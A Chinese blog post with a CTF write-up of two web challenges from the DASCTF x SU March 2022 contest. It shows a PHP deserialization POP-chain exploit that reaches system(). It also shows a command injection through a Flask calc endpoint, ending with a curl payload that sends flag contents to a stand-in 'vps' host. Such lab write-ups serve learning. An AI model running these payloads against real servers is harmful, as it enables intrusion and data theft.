DASCTF x SU 三月wp+复现

已于 2022-03-30 10:53:02 修改
阅读量632 收藏
点赞数
分类专栏: 比赛 文章标签: php
于 2022-03-30 08:35:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuermon/article/details/123837025
版权

之前给忘了 已经搭建新站很久了~
师傅们来找我玩呀
因为还没复现完就先放这里了 复现完再放新站

ezpop

直接得到源码:

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

pop链:

1.首先找到destruct方法作为入口,触发toString

2.what类里面转到mix类的run方法

3.mix的run触发crow的invoke方法

4.然后触发call方法调用get_flag

5.最后换行绕过注释

poc:

<?php

class crow
{
    public $v1;
    public $v2;
    public function __construct($v1,$v2)
    {
        $this->v1 = $v1;
        $this->v2 = $v2;
    }
}

class fin
{
    public $f1;
    public function __construct($f1)
    {
        $this->f1 = $f1;
    }
}

class what
{
    public $a;
    public function __construct($a)
    {
        $this->a = $a;
    }
}
class mix
{
    public function __construct($m1)
    {
        $this->m1 = $m1;
    }
}

$a = new fin(new what(new mix(new crow(new fin(new mix(';
system(\'grep -r "{"\');')),''))));
echo urlencode(serialize($a));

小记:
因为太菜了所以比赛的时候只做出了pop,其他题目等复现了再放上来

复现来啦 ~

calc
# coding=utf-8
from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \
    abort, send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app = Flask(__name__)


def waf(s):
    blacklist = ['import', '(', ')', ' ', '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system', 'class',
                 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess', 'file', 'open', 'popen',
                 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self', 'item', 'getitem',
                 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag


@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")


@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

1.赛时

waf过滤了很多关键词和符号,所以几乎不能用SSTI注入,但是当时就想着肯定能用SSTI,所以就一直卡住了(

然后因为之前做过类似的,利用报错进行模板注入,但是这道题利用1/0#这种形式也是完全过不了的,因为有js进行检测

然后就把目光放到了eval中,在想着该怎么传入num才使得eval或者system执行我们想要的代码,但是一直没有想到该怎么办

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip, num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)

2.赛后

赛后看了别的师傅的wp

确实是从os.system(log)入手的,但是这里用到#是为了注释掉后面的内容,因为如果eval(num)出错的话,是不会进行下去的,导致实现不了rce

img

而python又支持#与字符连接还是能当作注释符,而在unix中如果#与字符相邻则也会被当作字符,就可以利用这个区别直接构造payload

再利用反引号进行命令执行

不过感觉可能是环境原因,直接用反引号没有返回值,直接用curl外带,payload:

/calc?num=1%23`curl%09http://vps:5656/?flag=\`cat%09Th1s*\``
ameuu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DASCTF2021—MISC赛后复现
Sapphire037的博客
04-04 2005
DASCTF—MISC赛后复现 1.简单的png隐写 下载得到一张flag.jpg 和hint.png,把png拖进tweakpng中查看,数据块有点问题,好像有两张图在里面(多谢八神的misc入门题) ,然后删掉前四个IDAT块保存得到另一张图 根据图中内容,用outguess解,89504E应该是密码 root:~/桌面/outguess-master# outguess -k "89504E" -r flag.jpg h1.txt Reading flag.jpg.... Extracting usa
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(复现
ookami6497的博客
04-03 898
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
2022DASCTF X SU 三月春季挑战赛web部分
XINO
03-28 833
简单写一下
DASCTF 2024暑期挑战赛|为热爱,并肩作战
weixin_52640415的博客
07-21 1214
现在这密码全是格了,这格怎么个格法?
DASCTF部分复现
qq_63928796的博客
08-08 2576
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF2024 Sanic‘s revenge(复现
最新发布
2301_79700060的博客
07-23 2360
看来还是得老实的一步一步做呀,看见源码说删除了一些源码,那么当务之急是要先寻找源码,访问"/app/app. py",显示文件不存在,猜测源码文件应该是改了名字或者换了位置,然后本来想试着自己去找找新链子发现确实是不怎么好找,摆了。那么先读一手环境变量,文件名称“/proc/self/environ”,有时候也可以读取“/proc/1/environ”试试,发现还真有 flag。,实现穿越(这里穿越还是穿越的/static/,也就是到了 /app 目录下,因为 parts 没变嘛,污染。
DASCTF-两道web题复现
臭nana的博客
05-02 2945
记录一下官方题解 Ezunserialize 打开题目看到源码 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { retu...
DASCTF3月赛re部分wp
n1ptune__的博客
03-27 429
做出两道re,被大佬们带躺了个12 Enjoyit-1 这题送分题 .net程序,用dnspy反编译,主要逻辑如下 b.b检查输入是否在’_'和’z’之间 b.c是一个改表base64 写脚本解出符合条件的输入 import base64 src='abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ=' aaa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战...
su室内插件_sketchup模型库+SU组件+插件+风格库集+模型 建筑 室内 园林景观
weixin_33603656的博客
01-30 3175
因为专业,所以非常好!一直被模仿,从未被超越!琼州商城很少家整理《sketchup模型库+SU组件+插件+风格库集+模型 建筑 室内 园林景观》现已经更新到2013年,全部共3.1G,完整全集是亲非常佳的辅助资料!(咨询特价)年1月非常新更新重磅加入SU经典插件(一直困扰亲的作图慢作图难,不知道从何修图,琼州商城将给亲带来非常快的效率插件哦!)1。非常方便直观的翻面、找线头、清理费线、自动封面(修...
SU2013汉化+破解
01-25
SU2013汉化+破解,覆盖su2013安装根目录即可
DASCTF2022.07赋能赛 web 复现
shinygod的博客
11-02 582
DASCTF2022.07赋能赛 web 复现
【2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1572
DASCTF
DASCTF X SU三月
Re_ly0n的博客
03-27 585
Ezpop 因为疫情学校周末开始补课了,昨天就中午看了看题,做了一个web,挺简单的简单记录下。利用链很好找。说下坑点吧。当用hackerbar传入cmd参数时要使用raw,如下 然后导致我以为是需要原生类进行反序列化。 利用链 fin::__destruct()---->what::__toString()----->fin::run----->crow::__invoke()----->fin::world()----->fin::__call()-----&g
2022DASCTF X SU 三月春季挑战赛checkin(栈迁移,ret2dl)
m0_51251108的博客
09-26 401
ret2dl的复习
[2022DASCTF X SU 三月春季挑战赛]calc
weixin_45751765的博客
04-09 2085
0x00 前言 比赛时几乎没看这道题 一方面ssti一直是短板 另一方面upgdstore感觉快出了就想搏一搏… 弥补一下 0x01 brain.md 很常规的计算器 很贴心给了源码 # coding=utf-8 from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \ abort, send_from_directory
2022DASCTF X SU 三月春季挑战赛
qq_53263789的博客
03-30 836
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
2022DASCTF X SU 三月春季挑战赛 easyre
Todog的博客
04-06 594
有壳aspack,一般遇到都是upx,网上搜了aspack脱壳工具都没脱成功,使用手脱 手脱aspcak 打开od 下面使用ESP定律法进行脱壳 push压栈了,我们观察到esp中的值变红了,改动了。 在内存窗口中转到 下这个地址下硬件断点 运行软件,断到了。 接着f7 pop出栈,我们发现有个大规模跳转,应该就是oep了 调用api,是oep 准备dump一下 使用Lord Pe 先修正大小,然后dump 这个时候,我...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值